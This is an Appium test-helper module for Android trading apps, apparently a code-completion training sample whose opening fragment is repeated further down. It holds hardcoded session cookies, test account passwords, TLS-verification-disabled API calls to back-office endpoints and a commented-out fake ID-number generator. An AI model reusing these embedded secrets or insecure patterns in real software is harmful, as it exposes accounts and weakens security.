self.driver.find_element_by_id(package_name+":id/btn_cancel").click()
#點擊首頁消息中心
def click_home_message_center(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#點擊座標
TouchAction(self.driver).tap(element=None, x=x*0.81 ,y=y/19, count=1).perform()
#透過id
#self.driver.find_element_by_id('com.szoc.zb.cs:id/message_btn2').click()
#點擊首頁客服中心
def click_home_customer_service(self):
#透過id
#self.driver.find_element_by_id(package_name+':id/contact_btn2').click()
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#點擊座標
TouchAction(self.driver).tap(element=None, x=x*0.93 ,y=y/19, count=1).perform()
#點擊我頁面設置
def click_mypage_setting(self):
self.driver.find_element_by_id(package_name+":id/iv_user_center_setting").click()
#點擊我頁面消息中心
def click_mypage_message_center(self):
self.driver.find_element_by_id(package_name+":id/iv_user_center_message").click()
#點擊消息中心的返回
def click_message_center_return(self):
el2 = self.driver.find_element_by_xpath("/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.RelativeLayout/android.widget.LinearLayout/android.widget.LinearLayout/android.widget.LinearLayout/android.widget.RelativeLayout/android.widget.LinearLayout[1]/android.widget.ImageView")
el2.click()
#點擊我頁面在線客服
def click_mypage_customer_service(self):
self.driver.find_element_by_id(package_name+":id/rl_user_center_live").click()
#點擊我頁面切換真實模擬
def click_mypage_switch_account(self):
self.driver.find_element_by_id(package_name+":id/tv_real_demo_switch").click()
#點擊我頁面存款
def click_mypage_deposit(self):
self.driver.find_element_by_id(package_name+":id/tv_me_main_deposit").click()
#點擊我頁面取款
def click_mypage_withdraw(self):
self.driver.find_element_by_id(package_name+":id/tv_me_main_withdraw").click()
#點擊我頁面資金明細
def click_mypage_funding_details(self):
self.driver.find_element_by_xpath("//*[@text='资金明细']").click()
#點擊首頁
def press_home_tab(self):
self.driver.find_element_by_xpath("//*[@text='首页']").click()
#點擊首頁輪播廣告
def click_home_banner(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
for i in range(3):
#點擊座標
TouchAction(self.driver).tap(element=None, x=x/2 ,y=y/5, count=1).perform()
#點擊首頁登入/註冊
def click_home_register_login(self):
#做標定位只適用螢幕大小 2340*1080
#TouchAction(self.driver).tap(x=931, y=2149).perform()
#文字定位全部適用,但定位時間較久
self.driver.find_element_by_xpath("//*[@text='登录/注册']").click()
def click_home_real_account(self):
#TouchAction(self.driver).tap(x=750, y=1300).perform()
while True:
try:
#點擊首頁開立真實賬戶
self.driver.find_element_by_id(package_name + ":id/tv_open_two").click()
break
except NoSuchElementException:
#登出+回到首頁
Logout(self)
press_home_tab(self)
skip_ads(self)
def click_home_demo_account(self):
#TouchAction(self.driver).tap(x=250, y=1300).perform()
while True:
try:
#點擊首頁開立模擬賬戶
self.driver.find_element_by_id(package_name + ":id/tv_open_one").click()
break
except NoSuchElementException:
#登出+回到首頁
Logout(self)
press_home_tab(self)
skip_ads(self)
#點擊開戶
def click_login_create_account(self):
self.driver.find_element_by_id(package_name+":id/open_account_button").click()
#點擊模擬開戶
def click_create_demo_account(self):
self.driver.find_element_by_id(package_name+":id/main_top_right_tab").click()
#關閉H5
def close_html5(self):
#關閉H5
self.driver.find_element_by_id(package_name+":id/title_left_secondary_icon").click()
#往下滑
def scroll_down(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
x1=x/2
y1=y*0.8
y2=y*0.3
#TouchAction(self.driver).press(x=x1, y=y1).move_to(x=x1, y=y2).release().perform()
self.driver.swipe(x1,y1,x1,y2,1000)
#懂你所需左滑
def clever_need_swipe_left(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#懂你所需
coordinates = self.driver.find_element_by_id(package_name+':id/home_clever_need').location
y1 = coordinates['y'] + y/10
x1 = x*0.72
x2 = x*0.6
self.driver.swipe(x1,y1,x2,y1,1000)
#懂你所需右滑
def clever_need_swipe_right(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#懂你所需
coordinates = self.driver.find_element_by_id(package_name+':id/home_clever_need').location
y1 = coordinates['y'] + y/10
x2 = x*3/4
x1 = x/4
self.driver.swipe(x1,y1,x2,y1,1000)
#隨機產生密碼
def generate_random_password(self):
chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqstuvwxyz0123456789'
length = len(chars) - 1
random_password = ''
for i in range(random.randint(6,8)):
random_password+=chars[random.randint(0,length)]
random_password+=str(random.randint(0,9))
return random_password
#隨機產生電話
def random_phone_number(self):
area_list = ['130', '131', '132', '133', '134', '135', '136', '137',
'138', '139', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159','188','189']
numbers = '0123456789'
random_phone = random.choice(area_list)
for i in range(8):
random_phone+=numbers[random.randint(0,9)]
return random_phone
#隨機產生中文名
def random_chinese_name(self):
#隨機中文名
random_name = '測試'
for i in range(2):
random_name += chr(random.randint(0x4e00, 0x9fbf))
return random_name
#產生身分證API
'''def user_id_card_api(self):
request_url = "https://www.googlespeed.cn/idcard/ajax_get_idcard"
years = str(random.randint(1940,2001))
month = str(random.randint(1,12))
days = str(random.randint(1,30))
if(len(month)==1):
month = '0'+month
if(len(years)==1):
years = '0'+years
if(len(days)==1):
days = '0'+days
payload = {'sex': random.choice(['男','女']),
'year': years,
'month': month,
'day': days}
response = requests.request("POST", request_url, headers={}, data = payload)
data = response.json()
return data['id_list'][0]['id_card']'''
#獲取驗證碼API
def register_demo_account_api(self,random_phone):
if(package_name == 'com.szoc.zb.cs'):
request_url = "http://mis.will68.com/ValidateCodeLog/createValidateNo"
payload = random_phone
headers = {
'Cookie': '_ga=GA1.1.280281216.1603264849; _ga_DR6HQD5SM3=GS1.1.1604370924.4.0.1604370929.0; JSESSIONID=6E3FAB6D7BD7F37DC94282001269EB03; lang_type=0; cf88_id="user:1:3dce2613-06a3-45b3-ad00-6ba6f75d79a3"',
'Content-Type': 'text/plain'
}
response = requests.request("POST", request_url, headers=headers, data = payload)
data = response.json()
#回傳驗證碼
return data['data']
else:
request_url = "https://office.cf139.com/ValidateCodeLog/createValidateNo"
payload = random_phone
headers = {
'Connection': 'close',
'authority': 'office.cf139.com',
'accept': 'application/json, text/plain, */*',
'user-agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1',
'content-type': 'application/json;charset=UTF-8',
'origin': 'https://office.cf139.com',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': 'https://office.cf139.com/home/validater/validateNo',
'accept-language': 'zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7',
'cookie': 'lang_type=0; JSESSIONID=84871DBC50AD6CCE38923B5F4F7FC5DF; cf88_id="user:763:869480c1-ce0e-4232-9a65-65b9336b2cec"'
}
response = requests.request("POST", request_url, headers=headers, data = payload,verify = False)
#print(response.text.encode('utf8'))
data = response.json()
#回傳驗證碼
return data['data']
#添加白名單API
def White_List_API(self,random_phone):
if(package_name == 'com.szoc.zb.cs'):
request_url = "http://mis.will68.com/whitelists/edit"
payload = "{\"status\": 1, \"phone\": \""+random_phone+"\"}"
headers = {
'Cookie': '_ga=GA1.1.280281216.1603264849; _ga_DR6HQD5SM3=GS1.1.1604370924.4.0.1604370929.0; lang_type=0; JSESSIONID=C3883C50852D325D183B1E41F2DC8EF3; cf88_id="user:1:e7b99c9d-3916-461a-8d2d-975f7eeb18d7"',
'Content-Type': 'application/json'
}
response = requests.request("POST", request_url, headers=headers, data = payload)
data = response.json()
print('添加白名單結果為:',data['msg'])
else:
request_url = "https://office.cf139.com/whitelists/edit"
seconds = str(int(time.time()))
#payload = "{\"status\":1,\"remark\":\"YoYo-自動測試\",\"phone\":\""+random_phone+"\"}"
payload = "{\"phone\":\""+random_phone+"\",\"createTime\":1608542350760,\"ip\":\"\",\"updateTime\":"+seconds+",\"remark\":\"YoYo-自動測試\",\"id\":1593,\"idNumber\":\"\",\"email\":\"\",\"status\":1}"
headers = {
'authority': 'office.cf139.com',
'accept': 'application/json, text/plain, */*',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
'content-type': 'application/json;charset=UTF-8',
'origin': 'https://office.cf139.com',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': 'https://office.cf139.com/home/whitelist/index',
'accept-language': 'zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7',
'cookie': 'JSESSIONID=B9F4F676CC7B8728FF5EB497C6CA6FF1; cf88_id="user:763:99919735-b166-41db-bc21-fdd84d0c6734"; lang_type=0'
}
response = requests.request("POST", request_url, headers=headers, data = payload.encode("utf-8").decode("latin1"),verify = False)
#print(response.text.encode('utf8'))
data = response.json()
#回傳驗證碼
return data['data']
#登入
def Login(self):
try:
#點登錄註冊
click_home_register_login(self)
el1 = self.driver.find_element_by_id(package_name+":id/loginnameEditText")
el1.clear()
el1.send_keys(main_user_id)
el2 = self.driver.find_element_by_id(package_name+":id/password")
el2.clear()
el2.send_keys(main_user_password)
el3 = self.driver.find_element_by_id(package_name+":id/sign_in_button")
el3.click()
#跳廣告
skip_ads_no_wait(self)
except NoSuchElementException:
print('已登入...\n')
#登出
def Logout(self):
#切至我的頁面
press_my_button(self)
#點擊設置
el1 = self.driver.find_element_by_id(package_name+":id/iv_user_center_setting")
el1.click()
#退出登錄
el2 = self.driver.find_element_by_xpath("//*[@text='退出登录']")
el2.click()
#確認
el3 = self.driver.find_element_by_id(package_name+":id/action_btn_pos")
el3.click()
def check_new_account_login(self,account_type,password,random_phone):
#當前時間
current_time = datetime.now().isoformat()
if(account_type=='真實'):
try:
#點立擊體驗
self.driver.find_element_by_xpath("//*[@text='立即体验']").click()
#跳過廣告(不等開屏七秒)
skip_ads_no_wait(self)
#抓取帳號資訊(Parameter)
account_num,account_lvl = get_account_information(self)
print('開戶成功!帳號為:'+account_num,'級別為:'+account_lvl)
except NoSuchElementException:
print('錯誤!開戶後無法正常進入登入後畫面')
raise AssertionError('錯誤!開戶後無法正常進入登入後畫面')
# 讀取預約表(方便寫入資料)
with open(account_csv, newline='',encoding="utf-8") as csvfile:
#讀取預約表內容並存入writed_csv
rows = csv.reader(csvfile)
writed_csv = list(rows)
#寫入(新增帳號資訊)
with open(account_csv, 'w', newline='',encoding="utf-8") as csvfile:
writer = csv.writer(csvfile)
#寫入[帳號,手機,密碼,真實/模擬,帳戶等級,當前時間,包名]
account_information = [account_num,random_phone,password,account_type,account_lvl,current_time,package_name]
writed_csv.append(account_information)
# 寫入CSV
writer.writerows(writed_csv)
else:
try:
#點立擊體驗
self.driver.find_element_by_xpath("//*[@text='立即体验']").click()
#跳過廣告(不等開屏七秒)
skip_ads_no_wait(self)
#抓取帳號資訊(Parameter)
account_num = get_demo_account_information(self)
print('開戶成功!帳號為:'+account_num)
except NoSuchElementException:
print('錯誤!開戶後無法正常進入登入後畫面')
raise AssertionError('錯誤!開戶後無法正常進入登入後畫面')
# 讀取預約表(方便寫入資料)
with open(account_csv, newline='',encoding="utf-8") as csvfile:
#讀取預約表內容並存入writed_csv
rows = csv.reader(csvfile)
writed_csv = list(rows)
#寫入(新增帳號資訊)
with open(account_csv, 'w', newline='',encoding="utf-8") as csvfile:
writer = csv.writer(csvfile)
#寫入[帳號,手機,密碼,真實/模擬,帳戶等級,當前時間,包名]
account_information = [account_num,random_phone,password,account_type,'',current_time,package_name]
writed_csv.append(account_information)
#寫入CSV
writer.writerows(writed_csv)
| 富(用於關於創富檢查)
about_us_expect = '关于神龙科技'
#登入帳戶
main_user_id = '81018322'
main_user_demo_id = '11002074'
main_user_password = 'abc123'
#包為CF2
elif(package_name == 'com.gwtsz.gts2.cf2'):
#指定apk路徑
apk_url = dir_path + '/20201120-prd-cf2-1.8.3-release.apk'
#應用名稱&版本號(用於關於我們檢查)
app_name_version_expect = '柯洛夫黃金平台 V_1.8.6'
#關於創富(用於關於創富檢查) | conditional_block |
Parameter.py | # -*- coding: utf-8 -*-
import unittest
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException
from random import Random
from datetime import datetime
import unittest, time, re, os
import json
import requests
import csv
random = Random()
#=========UAT/PRD切換測試需更改之參數========
# 指定OS
OS = 'Windows'
#UAT
#package_name = 'com.szoc.zb.cs'
#PRD
#package_name = 'com.gwtsz.gts2.cf'
#cf2
package_name = 'com.gwtsz.gts2.cf2'
#cf3
#package_name = 'com.gwtsz.gts2.cf3'
#專案目錄
dir_path = os.path.dirname(os.path.realpath(__file__))
#包為PRD
if(package_name == 'com.gwtsz.gts2.cf'):
#指定apk路徑
apk_url = dir_path + '/release-cf-1.8.5-release_185_jiagu_sign_zp.apk'
#應用名稱&版本號(用於關於我們檢查)
app_name_version_expect = '创富CFD V_1.8.5'
#關於創富(用於關於創富檢查)
about_us_expect = '关于创富'
#登入帳戶
main_user_id = '81135805'
main_user_demo_id = '11092003'
main_user_password = 'abc123'
#包為UAT
elif(package_name == 'com.szoc.zb.cs'):
#指定apk路徑
apk_url = dir_path + '/2021-02-17-uat-cs-1.8.6-release.apk'
#應用名稱&版本號(用於關於我們檢查)
app_name_version_expect = 'ISTONE V_1.8.3'
#關於創富(用於關於創富檢查)
about_us_expect = '关于神龙科技'
#登入帳戶
main_user_id = '81018322'
main_user_demo_id = '11002074'
main_user_password = 'abc123'
#包為CF2
elif(package_name == 'com.gwtsz.gts2.cf2'):
#指定apk路徑
apk_url = dir_path + '/20201120-prd-cf2-1.8.3-release.apk'
#應用名稱&版本號(用於關於我們檢查)
app_name_version_expect = '柯洛夫黃金平台 V_1.8.6'
#關於創富(用於關於創富檢查)
about_us_expect = '关于创富'
#登入帳戶
main_user_id = '81134740'
main_user_demo_id = '11092003'
main_user_password = 'abc123'
#包為CF3
else:
# 指定apk路徑
apk_url = dir_path + 'release-cf3-1.8.5-release_185_jiagu_sign_zp-update&utm_medium=bycfd.apk'
# 應用名稱&版本號(用於關於我們檢查)
app_name_version_expect = '白银交易平台 V_1.8.5'
# 關於創富(用於關於創富檢查)
about_us_expect = '关于创富'
# 登入帳戶
main_user_id = '81134740'
main_user_demo_id = '11092003'
main_user_password = 'abc123'
#=========UAT/PRD切換測試需更改之參數========
account_csv = '帳號列表.csv'
#指定舊版本apk路徑(覆蓋安裝測試)
#old_apk_url = 'C:/Users/Angela/72apptest/20200812-uat-cs-1.8.2-release.apk'
#指定裝置、版本、安裝包
#每次開啟不重置app
desired_caps = {
#'platformName':'Android',
#'platformVersion':'5.1.1',
#'deviceName':'Android Emulator',
'platformName':'Android',
'platformVersion':'10', | 'noReset':True
}
#每次開啟重置app
desired_caps_reset = {
'platformName':desired_caps['platformName'],
'platformVersion':desired_caps['platformVersion'],
'deviceName':desired_caps['deviceName'],
'appPackage':desired_caps['appPackage'],
'appActivity':desired_caps['appActivity'],
'newCommandTimeout':desired_caps['newCommandTimeout'],
'noReset':False
}
#不啟動app,開桌面
desired_install = {
'platformName':desired_caps['platformName'],
'platformVersion':desired_caps['platformVersion'],
'deviceName':desired_caps['deviceName'],
}
Remote_url = 'http://localhost:4723/wd/hub'
#檢查app是否安裝,若沒安裝則自動安裝
def check_app_installed():
driver_install = webdriver.Remote(Remote_url, desired_install)
if(driver_install.is_app_installed(desired_caps['appPackage'])):
print('APP已經安裝')
else:
driver_install.install_app(apk_url)
print('APP安裝完畢')
driver_install.quit()
#跳過廣告
def skip_ads(self):
time.sleep(12)
#1.跳過開屏廣告 2.關版本升級 3.關彈窗廣告
#沒有彈出版本升級或廣告就跳過不執行
element_list = [package_name+':id/tv_skip',package_name+':id/btn_cancel',package_name+':id/close_btn']
for element in element_list:
try:
self.driver.find_element_by_id(element).click()
except NoSuchElementException:
continue
#跳過廣告(不等開屏七秒)
def skip_ads_no_wait(self):
#設置隱性等待2秒
self.driver.implicitly_wait(2)
#1.跳過開屏廣告 2.關版本升級 3.關彈窗廣告
#沒有彈出版本升級或廣告就跳過不執行
element_list = [package_name+':id/tv_skip',package_name+':id/btn_cancel',package_name+':id/close_btn']
for element in element_list:
try:
self.driver.find_element_by_id(element).click()
except NoSuchElementException:
continue
self.driver.implicitly_wait(10)
#跳過文字彈窗
def skip_pop_ups_dialog(self):
try:
#點擊文字彈窗
self.driver.find_element_by_xpath("//*[@text='立即前往']").click()
time.sleep(2)
#關閉文字彈窗H5
self.driver.find_element_by_id(package_name+":id/title_left_secondary_icon").click()
except NoSuchElementException:
pass
#點允許(在app內時)
def click_allow(self):
try:
self.driver.find_element_by_xpath("//*[@text='允許']").click()
print('點擊允許')
except NoSuchElementException:
print('允許未跳出')
#點允許(不在app內時)
def click_allow_outside_app():
driver_allow = webdriver.Remote(Remote_url, desired_install)
try:
driver_allow.find_element_by_xpath("//*[@text='允許']").click()
print('點擊允許')
except NoSuchElementException:
print('允許未跳出')
driver_allow.quit()
#點擊我的頁面
def press_my_button(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#點擊座標
TouchAction(self.driver).tap(element=None, x=x*0.9, y=y-1, count=1).perform()
#element = self.driver.find_element_by_id('com.gwtsz.gts2.cf:id/radio_button_text').find_element_by_xpath("//*[@text='我的']")
#element.click()
#行情tab
def click_quotation(self):
element = self.driver.find_element_by_xpath("/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/androidx.recyclerview.widget.RecyclerView/android.widget.RelativeLayout[2]/android.widget.LinearLayout/android.widget.ImageView")
element.click()
#交易tab
def click_transaction(self):
element = self.driver.find_element_by_xpath("/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/android.widget.RelativeLayout/androidx.recyclerview.widget.RecyclerView/android.widget.RelativeLayout[3]/android.widget.LinearLayout/android.widget.ImageView")
element.click()
#取得真實帳號資訊
def get_account_information(self):
#點我頁面TAB(Parameter)
press_my_button(self)
#點我頁面登入頭像
self.driver.find_element_by_id(package_name+":id/iv_me_head_icon").click()
#取得帳號
account_num = self.driver.find_element_by_id(package_name+":id/dialog_content_text2").text
#取得帳號級別
account_lvl = self.driver.find_element_by_id(package_name+":id/dialog_content_text3").text
self.driver.find_element_by_xpath("//*[@text='知道了']").click()
return account_num,account_lvl
#取得模擬帳號資訊
def get_demo_account_information(self):
#點我頁面TAB(Parameter)
press_my_button(self)
#點我頁面登入頭像
self.driver.find_element_by_id(package_name+":id/iv_me_head_icon").click()
#取得帳號
account_num = self.driver.find_element_by_id(package_name+":id/dialog_content_text2").text
self.driver.find_element_by_xpath("//*[@text='知道了']").click()
return account_num
#關閉分享彈窗
def close_share_window(self):
self.driver.find_element_by_id(package_name+":id/btn_cancel").click()
#點擊首頁消息中心
def click_home_message_center(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#點擊座標
TouchAction(self.driver).tap(element=None, x=x*0.81 ,y=y/19, count=1).perform()
#透過id
#self.driver.find_element_by_id('com.szoc.zb.cs:id/message_btn2').click()
#點擊首頁客服中心
def click_home_customer_service(self):
#透過id
#self.driver.find_element_by_id(package_name+':id/contact_btn2').click()
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#點擊座標
TouchAction(self.driver).tap(element=None, x=x*0.93 ,y=y/19, count=1).perform()
#點擊我頁面設置
def click_mypage_setting(self):
self.driver.find_element_by_id(package_name+":id/iv_user_center_setting").click()
#點擊我頁面消息中心
def click_mypage_message_center(self):
self.driver.find_element_by_id(package_name+":id/iv_user_center_message").click()
#點擊消息中心的返回
def click_message_center_return(self):
el2 = self.driver.find_element_by_xpath("/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.RelativeLayout/android.widget.LinearLayout/android.widget.LinearLayout/android.widget.LinearLayout/android.widget.RelativeLayout/android.widget.LinearLayout[1]/android.widget.ImageView")
el2.click()
#點擊我頁面在線客服
def click_mypage_customer_service(self):
self.driver.find_element_by_id(package_name+":id/rl_user_center_live").click()
#點擊我頁面切換真實模擬
def click_mypage_switch_account(self):
self.driver.find_element_by_id(package_name+":id/tv_real_demo_switch").click()
#點擊我頁面存款
def click_mypage_deposit(self):
self.driver.find_element_by_id(package_name+":id/tv_me_main_deposit").click()
#點擊我頁面取款
def click_mypage_withdraw(self):
self.driver.find_element_by_id(package_name+":id/tv_me_main_withdraw").click()
#點擊我頁面資金明細
def click_mypage_funding_details(self):
self.driver.find_element_by_xpath("//*[@text='资金明细']").click()
#點擊首頁
def press_home_tab(self):
self.driver.find_element_by_xpath("//*[@text='首页']").click()
#點擊首頁輪播廣告
def click_home_banner(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
for i in range(3):
#點擊座標
TouchAction(self.driver).tap(element=None, x=x/2 ,y=y/5, count=1).perform()
#點擊首頁登入/註冊
def click_home_register_login(self):
#做標定位只適用螢幕大小 2340*1080
#TouchAction(self.driver).tap(x=931, y=2149).perform()
#文字定位全部適用,但定位時間較久
self.driver.find_element_by_xpath("//*[@text='登录/注册']").click()
def click_home_real_account(self):
#TouchAction(self.driver).tap(x=750, y=1300).perform()
while True:
try:
#點擊首頁開立真實賬戶
self.driver.find_element_by_id(package_name + ":id/tv_open_two").click()
break
except NoSuchElementException:
#登出+回到首頁
Logout(self)
press_home_tab(self)
skip_ads(self)
def click_home_demo_account(self):
#TouchAction(self.driver).tap(x=250, y=1300).perform()
while True:
try:
#點擊首頁開立模擬賬戶
self.driver.find_element_by_id(package_name + ":id/tv_open_one").click()
break
except NoSuchElementException:
#登出+回到首頁
Logout(self)
press_home_tab(self)
skip_ads(self)
#點擊開戶
def click_login_create_account(self):
self.driver.find_element_by_id(package_name+":id/open_account_button").click()
#點擊模擬開戶
def click_create_demo_account(self):
self.driver.find_element_by_id(package_name+":id/main_top_right_tab").click()
#關閉H5
def close_html5(self):
#關閉H5
self.driver.find_element_by_id(package_name+":id/title_left_secondary_icon").click()
#往下滑
def scroll_down(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
x1=x/2
y1=y*0.8
y2=y*0.3
#TouchAction(self.driver).press(x=x1, y=y1).move_to(x=x1, y=y2).release().perform()
self.driver.swipe(x1,y1,x1,y2,1000)
#懂你所需左滑
def clever_need_swipe_left(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#懂你所需
coordinates = self.driver.find_element_by_id(package_name+':id/home_clever_need').location
y1 = coordinates['y'] + y/10
x1 = x*0.72
x2 = x*0.6
self.driver.swipe(x1,y1,x2,y1,1000)
#懂你所需右滑
def clever_need_swipe_right(self):
time.sleep(2)
x=self.driver.get_window_size()['width']
y=self.driver.get_window_size()['height']
#懂你所需
coordinates = self.driver.find_element_by_id(package_name+':id/home_clever_need').location
y1 = coordinates['y'] + y/10
x2 = x*3/4
x1 = x/4
self.driver.swipe(x1,y1,x2,y1,1000)
#隨機產生密碼
def generate_random_password(self):
chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqstuvwxyz0123456789'
length = len(chars) - 1
random_password = ''
for i in range(random.randint(6,8)):
random_password+=chars[random.randint(0,length)]
random_password+=str(random.randint(0,9))
return random_password
#隨機產生電話
def random_phone_number(self):
area_list = ['130', '131', '132', '133', '134', '135', '136', '137',
'138', '139', '150', '151', '152', '153', '154', '155', '156', '157', '158', '159','188','189']
numbers = '0123456789'
random_phone = random.choice(area_list)
for i in range(8):
random_phone+=numbers[random.randint(0,9)]
return random_phone
#隨機產生中文名
def random_chinese_name(self):
#隨機中文名
random_name = '測試'
for i in range(2):
random_name += chr(random.randint(0x4e00, 0x9fbf))
return random_name
#產生身分證API
'''def user_id_card_api(self):
request_url = "https://www.googlespeed.cn/idcard/ajax_get_idcard"
years = str(random.randint(1940,2001))
month = str(random.randint(1,12))
days = str(random.randint(1,30))
if(len(month)==1):
month = '0'+month
if(len(years)==1):
years = '0'+years
if(len(days)==1):
days = '0'+days
payload = {'sex': random.choice(['男','女']),
'year': years,
'month': month,
'day': days}
response = requests.request("POST", request_url, headers={}, data = payload)
data = response.json()
return data['id_list'][0]['id_card']'''
#獲取驗證碼API
def register_demo_account_api(self,random_phone):
if(package_name == 'com.szoc.zb.cs'):
request_url = "http://mis.will68.com/ValidateCodeLog/createValidateNo"
payload = random_phone
headers = {
'Cookie': '_ga=GA1.1.280281216.1603264849; _ga_DR6HQD5SM3=GS1.1.1604370924.4.0.1604370929.0; JSESSIONID=6E3FAB6D7BD7F37DC94282001269EB03; lang_type=0; cf88_id="user:1:3dce2613-06a3-45b3-ad00-6ba6f75d79a3"',
'Content-Type': 'text/plain'
}
response = requests.request("POST", request_url, headers=headers, data = payload)
data = response.json()
#回傳驗證碼
return data['data']
else:
request_url = "https://office.cf139.com/ValidateCodeLog/createValidateNo"
payload = random_phone
headers = {
'Connection': 'close',
'authority': 'office.cf139.com',
'accept': 'application/json, text/plain, */*',
'user-agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1',
'content-type': 'application/json;charset=UTF-8',
'origin': 'https://office.cf139.com',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': 'https://office.cf139.com/home/validater/validateNo',
'accept-language': 'zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7',
'cookie': 'lang_type=0; JSESSIONID=84871DBC50AD6CCE38923B5F4F7FC5DF; cf88_id="user:763:869480c1-ce0e-4232-9a65-65b9336b2cec"'
}
response = requests.request("POST", request_url, headers=headers, data = payload,verify = False)
#print(response.text.encode('utf8'))
data = response.json()
#回傳驗證碼
return data['data']
#添加白名單API
def White_List_API(self,random_phone):
if(package_name == 'com.szoc.zb.cs'):
request_url = "http://mis.will68.com/whitelists/edit"
payload = "{\"status\": 1, \"phone\": \""+random_phone+"\"}"
headers = {
'Cookie': '_ga=GA1.1.280281216.1603264849; _ga_DR6HQD5SM3=GS1.1.1604370924.4.0.1604370929.0; lang_type=0; JSESSIONID=C3883C50852D325D183B1E41F2DC8EF3; cf88_id="user:1:e7b99c9d-3916-461a-8d2d-975f7eeb18d7"',
'Content-Type': 'application/json'
}
response = requests.request("POST", request_url, headers=headers, data = payload)
data = response.json()
print('添加白名單結果為:',data['msg'])
else:
request_url = "https://office.cf139.com/whitelists/edit"
seconds = str(int(time.time()))
#payload = "{\"status\":1,\"remark\":\"YoYo-自動測試\",\"phone\":\""+random_phone+"\"}"
payload = "{\"phone\":\""+random_phone+"\",\"createTime\":1608542350760,\"ip\":\"\",\"updateTime\":"+seconds+",\"remark\":\"YoYo-自動測試\",\"id\":1593,\"idNumber\":\"\",\"email\":\"\",\"status\":1}"
headers = {
'authority': 'office.cf139.com',
'accept': 'application/json, text/plain, */*',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
'content-type': 'application/json;charset=UTF-8',
'origin': 'https://office.cf139.com',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': 'https://office.cf139.com/home/whitelist/index',
'accept-language': 'zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7',
'cookie': 'JSESSIONID=B9F4F676CC7B8728FF5EB497C6CA6FF1; cf88_id="user:763:99919735-b166-41db-bc21-fdd84d0c6734"; lang_type=0'
}
response = requests.request("POST", request_url, headers=headers, data = payload.encode("utf-8").decode("latin1"),verify = False)
#print(response.text.encode('utf8'))
data = response.json()
#回傳驗證碼
return data['data']
#登入
def Login(self):
try:
#點登錄註冊
click_home_register_login(self)
el1 = self.driver.find_element_by_id(package_name+":id/loginnameEditText")
el1.clear()
el1.send_keys(main_user_id)
el2 = self.driver.find_element_by_id(package_name+":id/password")
el2.clear()
el2.send_keys(main_user_password)
el3 = self.driver.find_element_by_id(package_name+":id/sign_in_button")
el3.click()
#跳廣告
skip_ads_no_wait(self)
except NoSuchElementException:
print('已登入...\n')
#登出
def Logout(self):
#切至我的頁面
press_my_button(self)
#點擊設置
el1 = self.driver.find_element_by_id(package_name+":id/iv_user_center_setting")
el1.click()
#退出登錄
el2 = self.driver.find_element_by_xpath("//*[@text='退出登录']")
el2.click()
#確認
el3 = self.driver.find_element_by_id(package_name+":id/action_btn_pos")
el3.click()
def check_new_account_login(self,account_type,password,random_phone):
#當前時間
current_time = datetime.now().isoformat()
if(account_type=='真實'):
try:
#點立擊體驗
self.driver.find_element_by_xpath("//*[@text='立即体验']").click()
#跳過廣告(不等開屏七秒)
skip_ads_no_wait(self)
#抓取帳號資訊(Parameter)
account_num,account_lvl = get_account_information(self)
print('開戶成功!帳號為:'+account_num,'級別為:'+account_lvl)
except NoSuchElementException:
print('錯誤!開戶後無法正常進入登入後畫面')
raise AssertionError('錯誤!開戶後無法正常進入登入後畫面')
